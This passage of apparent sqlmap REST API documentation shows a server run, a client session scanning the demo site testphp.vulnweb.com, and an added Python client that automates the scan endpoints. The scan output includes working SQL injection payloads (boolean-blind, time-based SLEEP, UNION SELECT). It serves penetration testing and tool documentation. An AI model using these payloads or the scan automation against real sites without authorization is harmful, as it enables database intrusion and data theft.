  • kill -- kill the current task
  • list -- display all tasks (of the current session)
  • flush -- flush tasks (delete all tasks)
  • exit -- exit the client interface

Example of running a server:

$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages

Example of running a client:

$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/start
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'...
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api> ?
help        Show this help message
new ARGS    Start a new scan task with provided arguments (e.g. 'new -u "http://testphp.vulnweb.com/artists.php?artist=1"')
use TASKID  Switch current context to different task (e.g. 'use c04d8c5c7582efb4')
data        Retrieve and show data for current task
log         Retrieve and show log for current task
status      Retrieve and show status for current task
stop        Stop current task
kill        Kill current task
list        Display all tasks
flush       Flush tasks (delete all tasks)
exit        Exit this client
api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-session
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)> status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/status
{
    "status": "running",
    "returncode": null,
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/status
{
    "status": "terminated",
    "returncode": 0,
    "success": true
}
api (a42ddaef02e976f0)> log
[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
{
    "log": [
        {
            "message": "flushing session file",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing connection to the target URL",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "checking if the target is protected by some kind of WAF/IPS/IDS",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "testing if the target URL is stable",
            "level": "INFO",
            "time": "12:48:10"
        },
        {
            "message": "target URL is stable",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing if GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "confirming that GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' is dynamic",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing for SQL injection on GET parameter 'artist'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING clause'",
            "level": "INFO",
            "time": "12:48:11"
        },
        {
            "message": "GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"hac\")",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'",
            "level": "INFO",
            "time": "12:48:12"
        },
        {
            "message": "testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL inline queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (comment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "testing 'MySQL >= 5.0.12 AND time-based blind'",
            "level": "INFO",
            "time": "12:48:13"
        },
        {
            "message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable ",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "target URL appears to have 3 columns in query",
            "level": "INFO",
            "time": "12:48:23"
        },
        {
            "message": "GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "the back-end DBMS is MySQL",
            "level": "INFO",
            "time": "12:48:24"
        },
        {
            "message": "fetching banner",
            "level": "INFO",
            "time": "12:48:24"
        }
    ],
    "success": true
}
api (a42ddaef02e976f0)> data
[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
{
    "data": [
        {
            "status": 1,
            "type": 0,
            "value": [
                {
                    "dbms": "MySQL",
                    "suffix": "",
                    "clause": [
                        1,
                        9
                    ],
                    "notes": [],
                    "ptype": 1,
                    "dbms_version": [
                        ">= 5.0.12"
                    ],
                    "prefix": "",
                    "place": "GET",
                    "os": null,
                    "conf": {
                        "code": null,
                        "string": "hac",
                        "notString": null,
                        "titles": false,
                        "regexp": null,
                        "textOnly": false,
                        "optimize": false
                    },
                    "parameter": "artist",
                    "data": {
                        "1": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "AND boolean-based blind - WHERE or HAVING clause",
                            "templatePayload": null,
                            "vector": "AND [INFERENCE]",
                            "falseCode": 200,
                            "where": 1,
                            "payload": "artist=1 AND 2794=2794"
                        },
                        "5": {
                            "comment": "",
                            "matchRatio": 0.85,
                            "trueCode": 200,
                            "title": "MySQL >= 5.0.12 AND time-based blind",
                            "templatePayload": null,
                            "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])",
                            "falseCode": null,
                            "where": 1,
                            "payload": "artist=1 AND SLEEP([SLEEPTIME])"
                        },
                        "6": {
                            "comment": "[GENERIC_SQL_COMMENT]",
                            "matchRatio": 0.85,
                            "trueCode": null,
                            "title": "Generic UNION query (NULL) - 1 to 20 columns",
                            "templatePayload": null,
                            "vector": [
                                2,
                                3,
                                "[GENERIC_SQL_COMMENT]",
                                "",
                                "",
                                "NULL",
                                2,
                                false,
                                false
                            ],
                            "falseCode": null,
                            "where": 2,
                            "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649704c68614672644a477474,0x7162717171)-- aAjy"
                        }
                    }
                }
            ]
        },
        {
            "status": 1,
            "type": 2,
            "value": "5.1.73-0ubuntu0.10.04.1"
        }
    ],
    "success": true,
    "error": []
}
api (a42ddaef02e976f0)> exit
$
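The client session above can be scripted end to end. The following is an added example, not sqlmap's own code, of a small Python client that walks the same /task/new, /scan/<taskid>/start, /status, /log and /data endpoints and flattens the /data reply into one record per confirmed technique, the shape a defender wants when gating a build on an authorized scan of their own application. It assumes the JSON field names shown in the session above and that a "type" of 0 carries the techniques and 2 the banner (taken from this page's output; the numbering is sqlmap's CONTENT_TYPE enum and varies between versions); the HTTP transport is injectable so the logic can be exercised offline.

```python
import json
import time
import urllib.request
from typing import Any, Callable, Dict, List, Optional

# Transport: (method, url, body) -> decoded JSON reply; injectable so tests can run offline.
Transport = Callable[[str, str, Optional[bytes]], Dict[str, Any]]

# Assumed meaning of the "type" field in this page's /data output (0 = injection
# techniques, 2 = banner); the numbering differs between sqlmap versions, so verify it.
TYPE_TECHNIQUES = 0
TYPE_BANNER = 2


def http_json(method: str, url: str, body: Optional[bytes] = None) -> Dict[str, Any]:
    """Default transport: one HTTP request via urllib, JSON reply decoded."""
    req = urllib.request.Request(url, data=body, method=method)
    if body is not None:
        req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


class SqlmapApiClient:
    """Drives the /task/new and /scan/<taskid>/{start,status,log,data} endpoints."""

    def __init__(self, base_url: str = "http://127.0.0.1:8775",
                 transport: Transport = http_json) -> None:
        self.base_url = base_url.rstrip("/")
        self.transport = transport

    def _call(self, method: str, path: str, body: Optional[bytes] = None) -> Dict[str, Any]:
        reply = self.transport(method, self.base_url + path, body)
        if not reply.get("success", False):  # every reply shown on this page carries "success"
            raise RuntimeError(f"{path} failed: {reply.get('message', reply)}")
        return reply

    def new_task(self) -> str:
        return self._call("GET", "/task/new")["taskid"]

    def start_scan(self, taskid: str, options: Dict[str, Any]) -> None:
        # Options are posted as JSON keyed by sqlmap's long option names,
        # e.g. {"url": "...", "banner": True}, like the curl example above.
        self._call("POST", f"/scan/{taskid}/start", json.dumps(options).encode("utf-8"))

    def wait(self, taskid: str, poll_seconds: float = 5.0, timeout: float = 900.0) -> int:
        """Poll /status until the scan reports 'terminated' and return its returncode."""
        deadline = time.monotonic() + timeout
        while True:
            reply = self._call("GET", f"/scan/{taskid}/status")
            if reply.get("status") == "terminated":
                rc = reply.get("returncode")
                return 0 if rc is None else int(rc)
            if time.monotonic() >= deadline:
                raise TimeoutError(f"scan {taskid} still '{reply.get('status')}' after {timeout}s")
            time.sleep(poll_seconds)

    def log(self, taskid: str) -> List[Dict[str, str]]:
        return self._call("GET", f"/scan/{taskid}/log")["log"]

    def data(self, taskid: str) -> Dict[str, Any]:
        return self._call("GET", f"/scan/{taskid}/data")


def summarize(data_reply: Dict[str, Any]) -> Dict[str, Any]:
    """Flatten a /data reply into the banner plus one record per confirmed technique."""
    findings: List[Dict[str, Any]] = []
    banner: Optional[str] = None
    for item in data_reply.get("data", []):
        if item.get("type") == TYPE_BANNER:
            banner = item.get("value")
        elif item.get("type") == TYPE_TECHNIQUES:
            for target in item.get("value", []):  # one entry per injectable parameter
                for technique in target.get("data", {}).values():
                    findings.append({"place": target.get("place"), "parameter": target.get("parameter"),
                                     "dbms": target.get("dbms"), "title": technique.get("title"),
                                     "payload": technique.get("payload")})
    return {"banner": banner, "findings": findings, "errors": data_reply.get("error", [])}
```

Keep the server on its default 127.0.0.1 bind unless the host sits on a trusted network: the server run above listens on 0.0.0.0, and the version shown offers no authentication option, so anyone who can reach port 8775 can create tasks and launch scans from that host.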
